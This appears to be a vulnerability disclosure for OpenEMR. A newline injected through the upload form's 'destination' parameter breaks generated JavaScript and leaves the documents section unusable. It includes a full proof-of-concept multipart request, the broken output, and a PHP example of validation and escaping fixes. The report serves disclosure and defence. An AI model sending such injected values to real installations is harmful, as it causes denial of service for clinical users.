Improper Name Validation in Upload Document Form in openemr/openemr

Valid

Reported on Oct 6th 2022

Description

The name of any uploaded document can be manipulated through the destination parameter so that it contains newline characters. The unescaped newline breaks the JS code generated for the "New Documents" section of the "Miscellaneous" menu, which stays blank until the document is removed from the database.

Proof of Concept

The following request was sent to upload a dummy file whose destination parameter includes a newline character:

POST /openemr/controller.php?document&upload&patient_id=00&parent_id=1& HTTP/1.1
(...snip...)
Content-Type: multipart/form-data; boundary=---------------------------139184551113566022282519832587
Upgrade-Insecure-Requests: 1

-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="MAX_FILE_SIZE"

64000000
-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="file[]"; filename="1234.txt"
Content-Type: text/plain

TEST
-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="dicom_folder[]"; filename=""
Content-Type: application/octet-stream


-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="destination"

test
1234
-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="passphrase"


-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="patient_id"

00
-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="category_id"

1
-----------------------------139184551113566022282519832587
Content-Disposition: form-data; name="process"

true
-----------------------------139184551113566022282519832587--

That value was used as a "virtual" name and was reflected, unescaped, into the JS code generated for the "New Documents" section:

newNode_14 = newNode.addItem(new TreeNode('2022-10-05 test
1234-16', 'file3.png', '/openemr/controller.php?document&view&patient_id=00&doc_id=16&', false, true, '', '', 'folder-expanded.gif'));

That newline breaks the JS code, so the section contents can no longer be displayed and the user loses the ability to manage files:

Uncaught SyntaxError: '' string literal contains an unescaped line break controller.php:116:60
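As an added example of the two defensive layers a maintainer would want here (this is not OpenEMR's code and not a reproduction of the 37d7ed fix; the helper names are hypothetical): reject control characters in the destination name at upload time, and emit the generated TreeNode line through json_encode() so a stored name can never break out of the JS string literal.

```php
<?php
// Added example, not OpenEMR's code: input validation for the document
// name plus safe emission of the TreeNode JS line. Helper names are hypothetical.

// Reject a document name that is empty or contains any control character
// (\p{Cc} covers \n and \r). Returns null when the name is not acceptable;
// a preg_match() failure (invalid UTF-8) is treated as a rejection too.
function validateDocumentName(string $name): ?string
{
    $name = trim($name);
    if ($name === '' || preg_match('/\p{Cc}/u', $name) !== 0) {
        return null;
    }
    return $name;
}

// Vulnerable pattern: the stored name is concatenated straight into a JS
// string literal, so a newline in $label yields exactly the
// "string literal contains an unescaped line break" error from the report.
function treeNodeJsVulnerable(string $label, string $url): string
{
    return "newNode.addItem(new TreeNode('" . $label . "', '" . $url . "'));";
}

// json_encode() produces a valid JS string literal: \n and \r become escape
// sequences, and the HEX flags encode < > & ' " so the value can neither end
// the literal nor close the surrounding <script> element. (PHP 7.2+ for the
// JSON_INVALID_UTF8_SUBSTITUTE flag.)
function jsString(string $s): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP
           | JSON_UNESCAPED_SLASHES | JSON_INVALID_UTF8_SUBSTITUTE;
    return json_encode($s, $flags);
}

// Hardened pattern: every dynamic value goes through jsString().
function treeNodeJsSafe(string $label, string $url): string
{
    return "newNode.addItem(new TreeNode(" . jsString($label) . ", " . jsString($url) . "));";
}

// Constructed input mirroring the PoC destination: "test" LF "1234".
$destination = "test\n1234";
$label = "2022-10-05 {$destination}-16";
$url = '/openemr/controller.php?document&view&patient_id=00&doc_id=16&';

var_dump(validateDocumentName($destination));  // the validator rejects the newline
echo treeNodeJsVulnerable($label, $url), "\n";  // the raw newline splits the JS literal
echo treeNodeJsSafe($label, $url), "\n";        // the newline is emitted as an escape sequence
```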

Impact

Successful exploitation of this issue could lead to a denial of service, leaving the documents section broken and unusable until the record is removed from the database.

We are processing your report and will contact the openemr team within 24 hours. 7 months ago
We have contacted a member of the openemr team and are waiting to hear back 7 months ago
We have sent a follow up to the openemr team. We will try again in 7 days. 7 months ago
openemr/openemr maintainer has acknowledged this report 7 months ago
Brady Miller validated this vulnerability 7 months ago
xkulio has been awarded the disclosure bounty
Brady Miller marked this as fixed in 7.0.0.2 with commit 37d7ed 7 months ago
This vulnerability will not receive a CVE
Brady Miller published this vulnerability 5 months ago
Brady Miller (Maintainer), 5 months ago:

@admin, please assign a CVE. thanks!